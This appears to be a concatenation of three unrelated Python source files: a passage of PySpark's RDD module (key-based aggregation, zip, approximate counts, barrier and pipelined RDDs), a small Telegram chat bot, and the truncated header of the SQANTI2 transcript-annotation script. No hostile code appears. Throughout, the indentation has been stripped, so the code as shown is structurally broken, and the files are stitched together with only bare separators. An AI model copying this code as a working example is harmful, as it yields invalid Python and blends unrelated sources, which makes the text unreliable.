lambda v: seqFunc(createZero(), v), seqFunc, combFunc, numPartitions, partitionFunc
)
def foldByKey(
self: "RDD[Tuple[K, V]]",
zeroValue: V,
func: Callable[[V, V], V],
numPartitions: Optional[int] = None,
partitionFunc: Callable[[K], int] = portable_hash,
) -> "RDD[Tuple[K, V]]":
"""
Merge the values for each key using an associative function "func"
and a neutral "zeroValue" which may be added to the result an
arbitrary number of times, and must not change the result
(e.g., 0 for addition, or 1 for multiplication).
Examples
--------
>>> rdd = sc.parallelize([("a", 1), ("b", 1), ("a", 1)])
>>> from operator import add
>>> sorted(rdd.foldByKey(0, add).collect())
[('a', 2), ('b', 1)]
"""
def createZero() -> V:
return copy.deepcopy(zeroValue)
return self.combineByKey(
lambda v: func(createZero(), v), func, func, numPartitions, partitionFunc
)
def _memory_limit(self) -> int:
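# Memory budget parsed from spark.python.worker.memory (default "512m"), used by
# the external sort/merge helpers in sortByKey, combineByKey and groupByKey.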
return _parse_memory(self.ctx._conf.get("spark.python.worker.memory", "512m"))
# TODO: support variant with custom partitioner
def groupByKey(
self: "RDD[Tuple[K, V]]",
numPartitions: Optional[int] = None,
partitionFunc: Callable[[K], int] = portable_hash,
) -> "RDD[Tuple[K, Iterable[V]]]":
"""
Group the values for each key in the RDD into a single sequence.
Hash-partitions the resulting RDD with numPartitions partitions.
Notes
-----
If you are grouping in order to perform an aggregation (such as a
sum or average) over each key, using reduceByKey or aggregateByKey will
provide much better performance.
Examples
--------
>>> rdd = sc.parallelize([("a", 1), ("b", 1), ("a", 1)])
>>> sorted(rdd.groupByKey().mapValues(len).collect())
[('a', 2), ('b', 1)]
>>> sorted(rdd.groupByKey().mapValues(list).collect())
[('a', [1, 1]), ('b', [1])]
"""
def createCombiner(x: V) -> List[V]:
return [x]
def mergeValue(xs: List[V], x: V) -> List[V]:
xs.append(x)
return xs
def mergeCombiners(a: List[V], b: List[V]) -> List[V]:
a.extend(b)
return a
memory = self._memory_limit()
serializer = self._jrdd_deserializer
agg = Aggregator(createCombiner, mergeValue, mergeCombiners)
def combine(iterator: Iterable[Tuple[K, V]]) -> Iterable[Tuple[K, List[V]]]:
merger = ExternalMerger(agg, memory * 0.9, serializer)
merger.mergeValues(iterator)
return merger.items()
locally_combined = self.mapPartitions(combine, preservesPartitioning=True)
shuffled = locally_combined.partitionBy(numPartitions, partitionFunc)
def groupByKey(it: Iterable[Tuple[K, List[V]]]) -> Iterable[Tuple[K, List[V]]]:
merger = ExternalGroupBy(agg, memory, serializer)
merger.mergeCombiners(it)
return merger.items()
return shuffled.mapPartitions(groupByKey, True).mapValues(ResultIterable)
def flatMapValues(
self: "RDD[Tuple[K, V]]", f: Callable[[V], Iterable[U]]
) -> "RDD[Tuple[K, U]]":
"""
Pass each value in the key-value pair RDD through a flatMap function
without changing the keys; this also retains the original RDD's
partitioning.
Examples
--------
>>> x = sc.parallelize([("a", ["x", "y", "z"]), ("b", ["p", "r"])])
>>> def f(x): return x
>>> x.flatMapValues(f).collect()
[('a', 'x'), ('a', 'y'), ('a', 'z'), ('b', 'p'), ('b', 'r')]
"""
def flat_map_fn(kv: Tuple[K, V]) -> Iterable[Tuple[K, U]]:
return ((kv[0], x) for x in f(kv[1]))
return self.flatMap(flat_map_fn, preservesPartitioning=True)
def mapValues(self: "RDD[Tuple[K, V]]", f: Callable[[V], U]) -> "RDD[Tuple[K, U]]":
"""
Pass each value in the key-value pair RDD through a map function
without changing the keys; this also retains the original RDD's
partitioning.
Examples
--------
>>> x = sc.parallelize([("a", ["apple", "banana", "lemon"]), ("b", ["grapes"])])
>>> def f(x): return len(x)
>>> x.mapValues(f).collect()
[('a', 3), ('b', 1)]
"""
def map_values_fn(kv: Tuple[K, V]) -> Tuple[K, U]:
return kv[0], f(kv[1])
return self.map(map_values_fn, preservesPartitioning=True)
@overload
def groupWith(
self: "RDD[Tuple[K, V]]", other: "RDD[Tuple[K, V1]]"
) -> "RDD[Tuple[K, Tuple[ResultIterable[V], ResultIterable[V1]]]]":
...
@overload
def groupWith(
self: "RDD[Tuple[K, V]]", other: "RDD[Tuple[K, V1]]", __o1: "RDD[Tuple[K, V2]]"
) -> "RDD[Tuple[K, Tuple[ResultIterable[V], ResultIterable[V1], ResultIterable[V2]]]]":
...
@overload
def groupWith(
self: "RDD[Tuple[K, V]]",
other: "RDD[Tuple[K, V1]]",
_o1: "RDD[Tuple[K, V2]]",
_o2: "RDD[Tuple[K, V3]]",
) -> """RDD[
Tuple[
K,
Tuple[
ResultIterable[V],
ResultIterable[V1],
ResultIterable[V2],
ResultIterable[V3],
],
]
]""":
...
def groupWith( # type: ignore[misc]
self: "RDD[Tuple[Any, Any]]", other: "RDD[Tuple[Any, Any]]", *others: "RDD[Tuple[Any, Any]]"
) -> "RDD[Tuple[Any, Tuple[ResultIterable[Any], ...]]]":
"""
Alias for cogroup but with support for multiple RDDs.
Examples
--------
>>> w = sc.parallelize([("a", 5), ("b", 6)])
>>> x = sc.parallelize([("a", 1), ("b", 4)])
>>> y = sc.parallelize([("a", 2)])
>>> z = sc.parallelize([("b", 42)])
>>> [(x, tuple(map(list, y))) for x, y in sorted(list(w.groupWith(x, y, z).collect()))]
[('a', ([5], [1], [2], [])), ('b', ([6], [4], [], [42]))]
"""
return python_cogroup((self, other) + others, numPartitions=None)
# TODO: add variant with custom partitioner
def cogroup(
self: "RDD[Tuple[K, V]]",
other: "RDD[Tuple[K, U]]",
numPartitions: Optional[int] = None,
) -> "RDD[Tuple[K, Tuple[ResultIterable[V], ResultIterable[U]]]]":
"""
For each key k in `self` or `other`, return a resulting RDD that
contains a tuple with the list of values for that key in `self` as
well as `other`.
Examples
--------
>>> x = sc.parallelize([("a", 1), ("b", 4)])
>>> y = sc.parallelize([("a", 2)])
>>> [(x, tuple(map(list, y))) for x, y in sorted(list(x.cogroup(y).collect()))]
[('a', ([1], [2])), ('b', ([4], []))]
"""
return python_cogroup((self, other), numPartitions)
def sampleByKey(
self: "RDD[Tuple[K, V]]",
withReplacement: bool,
fractions: Dict[K, Union[float, int]],
seed: Optional[int] = None,
) -> "RDD[Tuple[K, V]]":
"""
Return a subset of this RDD sampled by key (via stratified sampling).
Create a sample of this RDD using variable sampling rates for
different keys as specified by fractions, a key to sampling rate map.
Examples
--------
>>> fractions = {"a": 0.2, "b": 0.1}
>>> rdd = sc.parallelize(fractions.keys()).cartesian(sc.parallelize(range(0, 1000)))
>>> sample = dict(rdd.sampleByKey(False, fractions, 2).groupByKey().collect())
>>> 100 < len(sample["a"]) < 300 and 50 < len(sample["b"]) < 150
True
>>> max(sample["a"]) <= 999 and min(sample["a"]) >= 0
True
>>> max(sample["b"]) <= 999 and min(sample["b"]) >= 0
True
"""
for fraction in fractions.values():
assert fraction >= 0.0, "Negative fraction value: %s" % fraction
return self.mapPartitionsWithIndex(
RDDStratifiedSampler(withReplacement, fractions, seed).func, True
)
def subtractByKey(
self: "RDD[Tuple[K, V]]",
other: "RDD[Tuple[K, Any]]",
numPartitions: Optional[int] = None,
) -> "RDD[Tuple[K, V]]":
"""
Return each (key, value) pair in `self` that has no pair with matching
key in `other`.
Examples
--------
>>> x = sc.parallelize([("a", 1), ("b", 4), ("b", 5), ("a", 2)])
>>> y = sc.parallelize([("a", 3), ("c", None)])
>>> sorted(x.subtractByKey(y).collect())
[('b', 4), ('b', 5)]
"""
def filter_func(pair: Tuple[K, Tuple[V, Any]]) -> bool:
key, (val1, val2) = pair
return val1 and not val2 # type: ignore[return-value]
return (
self.cogroup(other, numPartitions)
.filter(filter_func) # type: ignore[arg-type]
.flatMapValues(lambda x: x[0])
)
def subtract(self: "RDD[T]", other: "RDD[T]", numPartitions: Optional[int] = None) -> "RDD[T]":
"""
Return each value in `self` that is not contained in `other`.
Examples
--------
>>> x = sc.parallelize([("a", 1), ("b", 4), ("b", 5), ("a", 3)])
>>> y = sc.parallelize([("a", 3), ("c", None)])
>>> sorted(x.subtract(y).collect())
[('a', 1), ('b', 4), ('b', 5)]
"""
# note: here 'True' is just a placeholder
rdd = other.map(lambda x: (x, True))
return self.map(lambda x: (x, True)).subtractByKey(rdd, numPartitions).keys()
def keyBy(self: "RDD[T]", f: Callable[[T], K]) -> "RDD[Tuple[K, T]]":
"""
Creates tuples of the elements in this RDD by applying `f`.
Examples
--------
>>> x = sc.parallelize(range(0,3)).keyBy(lambda x: x*x)
>>> y = sc.parallelize(zip(range(0,5), range(0,5)))
>>> [(x, list(map(list, y))) for x, y in sorted(x.cogroup(y).collect())]
[(0, [[0], [0]]), (1, [[1], [1]]), (2, [[], [2]]), (3, [[], [3]]), (4, [[2], [4]])]
"""
return self.map(lambda x: (f(x), x))
def repartition(self: "RDD[T]", numPartitions: int) -> "RDD[T]":
"""
Return a new RDD that has exactly numPartitions partitions.
Can increase or decrease the level of parallelism in this RDD.
Internally, this uses a shuffle to redistribute data.
If you are decreasing the number of partitions in this RDD, consider
using `coalesce`, which can avoid performing a shuffle.
Examples
--------
>>> rdd = sc.parallelize([1,2,3,4,5,6,7], 4)
>>> sorted(rdd.glom().collect())
[[1], [2, 3], [4, 5], [6, 7]]
>>> len(rdd.repartition(2).glom().collect())
2
>>> len(rdd.repartition(10).glom().collect())
10
"""
return self.coalesce(numPartitions, shuffle=True)
def coalesce(self: "RDD[T]", numPartitions: int, shuffle: bool = False) -> "RDD[T]":
"""
Return a new RDD that is reduced into `numPartitions` partitions.
Examples
--------
>>> sc.parallelize([1, 2, 3, 4, 5], 3).glom().collect()
[[1], [2, 3], [4, 5]]
>>> sc.parallelize([1, 2, 3, 4, 5], 3).coalesce(1).glom().collect()
[[1, 2, 3, 4, 5]]
"""
if shuffle:
# Decrease the batch size in order to distribute evenly the elements across output
# partitions. Otherwise, repartition will possibly produce highly skewed partitions.
batchSize = min(10, self.ctx._batchSize or 1024)
ser = BatchedSerializer(CPickleSerializer(), batchSize)
selfCopy = self._reserialize(ser)
jrdd_deserializer = selfCopy._jrdd_deserializer
jrdd = selfCopy._jrdd.coalesce(numPartitions, shuffle)
else:
jrdd_deserializer = self._jrdd_deserializer
jrdd = self._jrdd.coalesce(numPartitions, shuffle)
return RDD(jrdd, self.ctx, jrdd_deserializer)
def zip(self: "RDD[T]", other: "RDD[U]") -> "RDD[Tuple[T, U]]":
"""
Zips this RDD with another one, returning key-value pairs with the
first element in each RDD, second element in each RDD, etc. Assumes
that the two RDDs have the same number of partitions and the same
number of elements in each partition (e.g. one was made through
a map on the other).
Examples
--------
>>> x = sc.parallelize(range(0,5))
>>> y = sc.parallelize(range(1000, 1005))
>>> x.zip(y).collect()
[(0, 1000), (1, 1001), (2, 1002), (3, 1003), (4, 1004)]
"""
def get_batch_size(ser: Serializer) -> int:
if isinstance(ser, BatchedSerializer):
return ser.batchSize
return 1 # not batched
def batch_as(rdd: "RDD[V]", batchSize: int) -> "RDD[V]":
return rdd._reserialize(BatchedSerializer(CPickleSerializer(), batchSize))
my_batch = get_batch_size(self._jrdd_deserializer)
other_batch = get_batch_size(other._jrdd_deserializer)
if my_batch != other_batch or not my_batch:
# use the smallest batchSize for both of them
batchSize = min(my_batch, other_batch)
if batchSize <= 0:
# auto batched or unlimited
batchSize = 100
other = batch_as(other, batchSize)
self = batch_as(self, batchSize)
if self.getNumPartitions() != other.getNumPartitions():
raise ValueError("Can only zip with RDD which has the same number of partitions")
# There will be an Exception in JVM if there are different number
# of items in each partitions.
pairRDD = self._jrdd.zip(other._jrdd)
deserializer = PairDeserializer(self._jrdd_deserializer, other._jrdd_deserializer)
return RDD(pairRDD, self.ctx, deserializer)
def zipWithIndex(self: "RDD[T]") -> "RDD[Tuple[T, int]]":
"""
Zips this RDD with its element indices.
The ordering is first based on the partition index and then the
ordering of items within each partition. So the first item in
the first partition gets index 0, and the last item in the last
partition receives the largest index.
This method needs to trigger a spark job when this RDD contains
more than one partition.
Examples
--------
>>> sc.parallelize(["a", "b", "c", "d"], 3).zipWithIndex().collect()
[('a', 0), ('b', 1), ('c', 2), ('d', 3)]
"""
starts = [0]
if self.getNumPartitions() > 1:
nums = self.mapPartitions(lambda it: [sum(1 for i in it)]).collect()
for i in range(len(nums) - 1):
starts.append(starts[-1] + nums[i])
def func(k: int, it: Iterable[T]) -> Iterable[Tuple[T, int]]:
for i, v in enumerate(it, starts[k]):
yield v, i
return self.mapPartitionsWithIndex(func)
def zipWithUniqueId(self: "RDD[T]") -> "RDD[Tuple[T, int]]":
"""
Zips this RDD with generated unique Long ids.
Items in the kth partition will get ids k, n+k, 2*n+k, ..., where
n is the number of partitions. So there may exist gaps, but this
method won't trigger a spark job, which is different from
:meth:`zipWithIndex`.
Examples
--------
>>> sc.parallelize(["a", "b", "c", "d", "e"], 3).zipWithUniqueId().collect()
[('a', 0), ('b', 1), ('c', 4), ('d', 2), ('e', 5)]
"""
n = self.getNumPartitions()
def func(k: int, it: Iterable[T]) -> Iterable[Tuple[T, int]]:
for i, v in enumerate(it):
yield v, i * n + k
return self.mapPartitionsWithIndex(func)
def name(self) -> Optional[str]:
"""
Return the name of this RDD.
"""
n = self._jrdd.name()
return n if n else None
def setName(self: "RDD[T]", name: str) -> "RDD[T]":
"""
Assign a name to this RDD.
Examples
--------
>>> rdd1 = sc.parallelize([1, 2])
>>> rdd1.setName('RDD1').name()
'RDD1'
"""
self._jrdd.setName(name)
return self
def toDebugString(self) -> Optional[bytes]:
"""
A description of this RDD and its recursive dependencies for debugging.
"""
debug_string = self._jrdd.toDebugString()
return debug_string.encode("utf-8") if debug_string else None
def getStorageLevel(self) -> StorageLevel:
"""
Get the RDD's current storage level.
Examples
--------
>>> rdd1 = sc.parallelize([1,2])
>>> rdd1.getStorageLevel()
StorageLevel(False, False, False, False, 1)
>>> print(rdd1.getStorageLevel())
Serialized 1x Replicated
"""
java_storage_level = self._jrdd.getStorageLevel()
storage_level = StorageLevel(
java_storage_level.useDisk(),
java_storage_level.useMemory(),
java_storage_level.useOffHeap(),
java_storage_level.deserialized(),
java_storage_level.replication(),
)
return storage_level
def _defaultReducePartitions(self) -> int:
"""
Returns the default number of partitions to use during reduce tasks (e.g., groupBy).
If spark.default.parallelism is set, then we'll use the value from SparkContext
defaultParallelism, otherwise we'll use the number of partitions in this RDD.
This mirrors the behavior of the Scala Partitioner#defaultPartitioner, intended to reduce
the likelihood of OOMs. Once PySpark adopts Partitioner-based APIs, this behavior will
be inherent.
"""
if self.ctx._conf.contains("spark.default.parallelism"):
return self.ctx.defaultParallelism
else:
return self.getNumPartitions()
def lookup(self: "RDD[Tuple[K, V]]", key: K) -> List[V]:
"""
Return the list of values in the RDD for key `key`. This operation
is done efficiently if the RDD has a known partitioner by only
searching the partition that the key maps to.
Examples
--------
>>> l = range(1000)
>>> rdd = sc.parallelize(zip(l, l), 10)
>>> rdd.lookup(42) # slow
[42]
>>> sorted = rdd.sortByKey()
>>> sorted.lookup(42) # fast
[42]
>>> sorted.lookup(1024)
[]
>>> rdd2 = sc.parallelize([(('a', 'b'), 'c')]).groupByKey()
>>> list(rdd2.lookup(('a', 'b'))[0])
['c']
"""
values = self.filter(lambda kv: kv[0] == key).values()
if self.partitioner is not None:
return self.ctx.runJob(values, lambda x: x, [self.partitioner(key)])
return values.collect()
def _to_java_object_rdd(self) -> "JavaObject":
"""Return a JavaRDD of Object by unpickling
It will convert each Python object into a Java object via Pickle, whether or not the
RDD is serialized in batches.
"""
rdd = self._pickled()
assert self.ctx._jvm is not None
return self.ctx._jvm.SerDeUtil.pythonToJava(rdd._jrdd, True)
def countApprox(self, timeout: int, confidence: float = 0.95) -> int:
"""
Approximate version of count() that returns a potentially incomplete
result within a timeout, even if not all tasks have finished.
Examples
--------
>>> rdd = sc.parallelize(range(1000), 10)
>>> rdd.countApprox(1000, 1.0)
1000
"""
drdd = self.mapPartitions(lambda it: [float(sum(1 for i in it))])
return int(drdd.sumApprox(timeout, confidence))
def sumApprox(
self: "RDD[Union[float, int]]", timeout: int, confidence: float = 0.95
) -> BoundedFloat:
"""
Approximate operation to return the sum within a timeout
or meet the confidence.
Examples
--------
>>> rdd = sc.parallelize(range(1000), 10)
>>> r = sum(range(1000))
>>> abs(rdd.sumApprox(1000) - r) / r < 0.05
True
"""
jrdd = self.mapPartitions(lambda it: [float(sum(it))])._to_java_object_rdd()
assert self.ctx._jvm is not None
jdrdd = self.ctx._jvm.JavaDoubleRDD.fromRDD(jrdd.rdd())
r = jdrdd.sumApprox(timeout, confidence).getFinalValue()
return BoundedFloat(r.mean(), r.confidence(), r.low(), r.high())
def meanApprox(
self: "RDD[Union[float, int]]", timeout: int, confidence: float = 0.95
) -> BoundedFloat:
"""
Approximate operation to return the mean within a timeout
or meet the confidence.
Examples
--------
>>> rdd = sc.parallelize(range(1000), 10)
>>> r = sum(range(1000)) / 1000.0
>>> abs(rdd.meanApprox(1000) - r) / r < 0.05
True
"""
jrdd = self.map(float)._to_java_object_rdd()
assert self.ctx._jvm is not None
jdrdd = self.ctx._jvm.JavaDoubleRDD.fromRDD(jrdd.rdd())
r = jdrdd.meanApprox(timeout, confidence).getFinalValue()
return BoundedFloat(r.mean(), r.confidence(), r.low(), r.high())
def countApproxDistinct(self: "RDD[T]", relativeSD: float = 0.05) -> int:
"""
Return approximate number of distinct elements in the RDD.
Parameters
----------
relativeSD : float, optional
Relative accuracy. Smaller values create
counters that require more space.
It must be greater than 0.000017.
Notes
-----
The algorithm used is based on streamlib's implementation of
`"HyperLogLog in Practice: Algorithmic Engineering of a State
of The Art Cardinality Estimation Algorithm", available here
<https://doi.org/10.1145/2452376.2452456>`_.
Examples
--------
>>> n = sc.parallelize(range(1000)).map(str).countApproxDistinct()
>>> 900 < n < 1100
True
>>> n = sc.parallelize([i % 20 for i in range(1000)]).countApproxDistinct()
>>> 16 < n < 24
True
"""
if relativeSD < 0.000017:
raise ValueError("relativeSD should be greater than 0.000017")
# the hash space in Java is 2^32
hashRDD = self.map(lambda x: portable_hash(x) & 0xFFFFFFFF)
return hashRDD._to_java_object_rdd().countApproxDistinct(relativeSD)
def toLocalIterator(self: "RDD[T]", prefetchPartitions: bool = False) -> Iterator[T]:
"""
Return an iterator that contains all of the elements in this RDD.
The iterator will consume as much memory as the largest partition in this RDD.
With prefetch it may consume up to the memory of the 2 largest partitions.
Parameters
----------
prefetchPartitions : bool, optional
If Spark should pre-fetch the next partition
before it is needed.
Examples
--------
>>> rdd = sc.parallelize(range(10))
>>> [x for x in rdd.toLocalIterator()]
[0, 1, 2, 3, 4, 5, 6, 7, 8, 9]
"""
assert self.ctx._jvm is not None
with SCCallSiteSync(self.context):
sock_info = self.ctx._jvm.PythonRDD.toLocalIteratorAndServe(
self._jrdd.rdd(), prefetchPartitions
)
return _local_iterator_from_socket(sock_info, self._jrdd_deserializer)
def barrier(self: "RDD[T]") -> "RDDBarrier[T]":
"""
Marks the current stage as a barrier stage, where Spark must launch all tasks together.
In case of a task failure, instead of only restarting the failed task, Spark will abort the
entire stage and relaunch all tasks for this stage.
The barrier execution mode feature is experimental and it only handles limited scenarios.
Please read the linked SPIP and design docs to understand the limitations and future plans.
.. versionadded:: 2.4.0
Returns
-------
:class:`RDDBarrier`
instance that provides actions within a barrier stage.
See Also
--------
pyspark.BarrierTaskContext
Notes
-----
For additional information see
- `SPIP: Barrier Execution Mode <http://jira.apache.org/jira/browse/SPARK-24374>`_
- `Design Doc <https://jira.apache.org/jira/browse/SPARK-24582>`_
This API is experimental
"""
return RDDBarrier(self)
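# Hedged usage sketch (not a doctest; barrier mode needs a cluster manager that supports it):
#
#     from pyspark import BarrierTaskContext
#     def sync_then_process(iterator):
#         BarrierTaskContext.get().barrier()   # wait for every task in the stage
#         return iterator
#     rdd.barrier().mapPartitions(sync_then_process)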
def _is_barrier(self) -> bool:
"""
Whether this RDD is in a barrier stage.
"""
return self._jrdd.rdd().isBarrier()
def withResources(self: "RDD[T]", profile: ResourceProfile) -> "RDD[T]":
"""
Specify a :class:`pyspark.resource.ResourceProfile` to use when calculating this RDD.
This is only supported on certain cluster managers and currently requires dynamic
allocation to be enabled. It will result in new executors with the resources specified
being acquired to calculate the RDD.
.. versionadded:: 3.1.0
Notes
-----
This API is experimental
"""
self.has_resource_profile = True
if profile._java_resource_profile is not None:
jrp = profile._java_resource_profile
else:
assert self.ctx._jvm is not None
builder = self.ctx._jvm.org.apache.spark.resource.ResourceProfileBuilder()
ereqs = ExecutorResourceRequests(self.ctx._jvm, profile._executor_resource_requests)
treqs = TaskResourceRequests(self.ctx._jvm, profile._task_resource_requests)
builder.require(ereqs._java_executor_resource_requests)
builder.require(treqs._java_task_resource_requests)
jrp = builder.build()
self._jrdd.withResources(jrp)
return self
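# Hedged usage sketch (assumes the pyspark.resource builder API and a cluster manager
# with dynamic allocation enabled):
#
#     from pyspark.resource import ResourceProfileBuilder, TaskResourceRequests
#     rp = ResourceProfileBuilder().require(TaskResourceRequests().cpus(2)).build
#     rdd.withResources(rp).collect()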
def getResourceProfile(self) -> Optional[ResourceProfile]:
"""
Get the :class:`pyspark.resource.ResourceProfile` specified with this RDD or None
if it wasn't specified.
.. versionadded:: 3.1.0
Returns
-------
:py:class:`pyspark.resource.ResourceProfile`
The user-specified profile, or None if none was specified
Notes
-----
This API is experimental
"""
rp = self._jrdd.getResourceProfile()
if rp is not None:
return ResourceProfile(_java_resource_profile=rp)
else:
return None
@overload
def toDF(
self: "RDD[RowLike]",
schema: Optional[Union[List[str], Tuple[str, ...]]] = None,
sampleRatio: Optional[float] = None,
) -> "DataFrame":
...
@overload
def toDF(
self: "RDD[RowLike]", schema: Optional[Union["StructType", str]] = None
) -> "DataFrame":
...
@overload
def toDF(
self: "RDD[AtomicValue]",
schema: Union["AtomicType", str],
) -> "DataFrame":
...
def toDF(
self: "RDD[Any]", schema: Optional[Any] = None, sampleRatio: Optional[float] = None
) -> "DataFrame":
raise RuntimeError("""RDD.toDF was called before SparkSession was initialized.""")
def _prepare_for_python_RDD(sc: "SparkContext", command: Any) -> Tuple[bytes, Any, Any, Any]:
# the serialized command will be compressed by broadcast
ser = CloudPickleSerializer()
pickled_command = ser.dumps(command)
assert sc._jvm is not None
if len(pickled_command) > sc._jvm.PythonUtils.getBroadcastThreshold(sc._jsc): # Default 1M
# The broadcast will have the same life cycle as the created PythonRDD
broadcast = sc.broadcast(pickled_command)
pickled_command = ser.dumps(broadcast)
broadcast_vars = [x._jbroadcast for x in sc._pickled_broadcast_vars]
sc._pickled_broadcast_vars.clear()
return pickled_command, broadcast_vars, sc.environment, sc._python_includes
def _wrap_function(
sc: "SparkContext", func: Callable, deserializer: Any, serializer: Any, profiler: Any = None
) -> "JavaObject":
assert deserializer, "deserializer should not be empty"
assert serializer, "serializer should not be empty"
command = (func, profiler, deserializer, serializer)
pickled_command, broadcast_vars, env, includes = _prepare_for_python_RDD(sc, command)
assert sc._jvm is not None
return sc._jvm.PythonFunction(
bytearray(pickled_command),
env,
includes,
sc.pythonExec,
sc.pythonVer,
broadcast_vars,
sc._javaAccumulator,
)
class RDDBarrier(Generic[T]):
"""
Wraps an RDD in a barrier stage, which forces Spark to launch tasks of this stage together.
:class:`RDDBarrier` instances are created by :func:`RDD.barrier`.
.. versionadded:: 2.4.0
Notes
-----
This API is experimental
"""
def __init__(self, rdd: RDD[T]):
self.rdd = rdd
def mapPartitions(
self, f: Callable[[Iterable[T]], Iterable[U]], preservesPartitioning: bool = False
) -> RDD[U]:
"""
Returns a new RDD by applying a function to each partition of the wrapped RDD,
where tasks are launched together in a barrier stage.
The interface is the same as :func:`RDD.mapPartitions`.
Please see the API doc there.
.. versionadded:: 2.4.0
Notes
-----
This API is experimental
"""
def func(s: int, iterator: Iterable[T]) -> Iterable[U]:
return f(iterator)
return PipelinedRDD(self.rdd, func, preservesPartitioning, isFromBarrier=True)
def mapPartitionsWithIndex(
self,
f: Callable[[int, Iterable[T]], Iterable[U]],
preservesPartitioning: bool = False,
) -> RDD[U]:
"""
Returns a new RDD by applying a function to each partition of the wrapped RDD, while
tracking the index of the original partition, and all tasks are launched together
in a barrier stage.
The interface is the same as :func:`RDD.mapPartitionsWithIndex`.
Please see the API doc there.
.. versionadded:: 3.0.0
Notes
-----
This API is experimental
"""
return PipelinedRDD(self.rdd, f, preservesPartitioning, isFromBarrier=True)
class PipelinedRDD(RDD[U], Generic[T, U]):
"""
Examples
--------
Pipelined maps:
>>> rdd = sc.parallelize([1, 2, 3, 4])
>>> rdd.map(lambda x: 2 * x).cache().map(lambda x: 2 * x).collect()
[4, 8, 12, 16]
>>> rdd.map(lambda x: 2 * x).map(lambda x: 2 * x).collect()
[4, 8, 12, 16]
Pipelined reduces:
>>> from operator import add
>>> rdd.map(lambda x: 2 * x).reduce(add)
20
>>> rdd.flatMap(lambda x: [x, x]).reduce(add)
20
"""
def __init__(
self,
prev: RDD[T],
func: Callable[[int, Iterable[T]], Iterable[U]],
preservesPartitioning: bool = False,
isFromBarrier: bool = False,
):
if not isinstance(prev, PipelinedRDD) or not prev._is_pipelinable():
# This transformation is the first in its stage:
self.func = func
self.preservesPartitioning = preservesPartitioning
self._prev_jrdd = prev._jrdd
self._prev_jrdd_deserializer = prev._jrdd_deserializer
else:
prev_func: Callable[[int, Iterable[V]], Iterable[T]] = prev.func
def pipeline_func(split: int, iterator: Iterable[V]) -> Iterable[U]:
return func(split, prev_func(split, iterator))
self.func = pipeline_func
self.preservesPartitioning = prev.preservesPartitioning and preservesPartitioning
self._prev_jrdd = prev._prev_jrdd # maintain the pipeline
self._prev_jrdd_deserializer = prev._prev_jrdd_deserializer
self.is_cached = False
self.has_resource_profile = False
self.is_checkpointed = False
self.ctx = prev.ctx
self.prev = prev
self._jrdd_val: Optional["JavaObject"] = None
self._id = None
self._jrdd_deserializer = self.ctx.serializer
self._bypass_serializer = False
self.partitioner = prev.partitioner if self.preservesPartitioning else None
self.is_barrier = isFromBarrier or prev._is_barrier()
def getNumPartitions(self) -> int:
return self._prev_jrdd.partitions().size()
@property
def _jrdd(self) -> "JavaObject":
if self._jrdd_val:
return self._jrdd_val
if self._bypass_serializer:
self._jrdd_deserializer = NoOpSerializer()
if self.ctx.profiler_collector:
profiler = self.ctx.profiler_collector.new_profiler(self.ctx)
else:
profiler = None
wrapped_func = _wrap_function(
self.ctx, self.func, self._prev_jrdd_deserializer, self._jrdd_deserializer, profiler
)
assert self.ctx._jvm is not None
python_rdd = self.ctx._jvm.PythonRDD(
self._prev_jrdd.rdd(), wrapped_func, self.preservesPartitioning, self.is_barrier
)
self._jrdd_val = python_rdd.asJavaRDD()
if profiler:
assert self._jrdd_val is not None
self._id = self._jrdd_val.id()
self.ctx.profiler_collector.add_profiler(self._id, profiler)
return self._jrdd_val
def id(self) -> int:
if self._id is None:
self._id = self._jrdd.id()
return self._id
def _is_pipelinable(self) -> bool:
return not (self.is_cached or self.is_checkpointed or self.has_resource_profile)
def _is_barrier(self) -> bool:
return self.is_barrier
def _test() -> None:
import doctest
from pyspark.context import SparkContext
globs = globals().copy()
# The small batch size here ensures that we see multiple batches,
# even in these small test examples:
globs["sc"] = SparkContext("local[4]", "PythonTest")
(failure_count, test_count) = doctest.testmod(globs=globs, optionflags=doctest.ELLIPSIS)
globs["sc"].stop()
if failure_count:
sys.exit(-1)
if __name__ == "__main__":
_test()
|
tg.py
|
import logging
import os
import queue
import threading
from telegram.ext import CommandHandler, Filters, MessageHandler, Updater
from client import chats, connect_ws, contexts
logging.basicConfig(
format='%(asctime)s - %(name)s - %(levelname)s - %(message)s', level=logging.DEBUG
)
BOT_TOKEN = os.environ["BOT_TOKEN"]
def start(update, context):
context.bot.send_message(
chat_id=update.effective_chat.id,
text=f"{update.effective_user.first_name}, just talk to me",
)
def talk(update, context):
incoming_message = update.message.text
chat_id = update.effective_chat.id
if chat_id not in chats:
chats[chat_id] = queue.Queue()
user = update.effective_user
username = f"{user.first_name} {user.last_name}"
threading.Thread(target=connect_ws, args=(chat_id, username)).start()
chats[chat_id].put(incoming_message)
contexts[chat_id] = context
def unknown(update, context):
context.bot.send_message(
chat_id=update.effective_chat.id,
text="sorry, I don't have any command. just talk to me",
)
if __name__ == "__main__":
updater = Updater(token=BOT_TOKEN, use_context=True)
dispatcher = updater.dispatcher
start_handler = CommandHandler("start", start)
message_handler = MessageHandler(Filters.text & (~Filters.command), talk)
unknown_handler = MessageHandler(Filters.command, unknown)
dispatcher.add_handler(start_handler)
dispatcher.add_handler(message_handler)
dispatcher.add_handler(unknown_handler)
updater.start_polling()
|
sqanti_qc2.py
|
#!/usr/bin/env python
# SQANTI: Structural and Quality Annotation of Novel Transcript Isoforms
# Authors: Lorena de la Fuente, Hector del Risco, Cecile Pereira and Manuel Tardaguila
# Modified by Liz (etseng@pacb.com) currently as SQANTI2 working version
__author__ = "etseng@pacb.com"
__version__ = '7.3.2' # Python 3.7
import os, re, sys, subprocess, timeit, glob, copy
import shutil
import distutils.spawn
import itertools
import bisect
import argparse
import math
from collections import defaultdict, Counter, namedtuple
from csv import DictWriter, DictReader
from multiprocessing import Process
utilitiesPath = os.path.dirname(os.path.realpath(__file__))+"/utilities/"
sys.path.insert(0, utilitiesPath)
from rt_switching import rts
from indels_annot import calc_indels_from_sam
try:
from Bio.Seq import Seq
from Bio import SeqIO
from Bio.SeqRecord import SeqRecord
except ImportError:
print("Unable to import Biopython! Please make sure Biopython is installed.", file=sys.stderr)
sys.exit(-1)
try:
from bx.intervals import Interval, IntervalTree
except ImportError:
print("Unable to import bx-python! Please make sure bx-python is installed.", file=sys.stderr)
sys.exit(-1)
try:
from BCBio import GFF as BCBio_GFF
except ImportError:
print("Unable to import BCBio! Please make sure bcbiogff is installed.", file=sys.stderr)
sys.exit(-1)
try:
from err_correct_w_genome import err_correct
from sam_to_gff3 import convert_sam_to_gff3
from STAR import STARJunctionReader
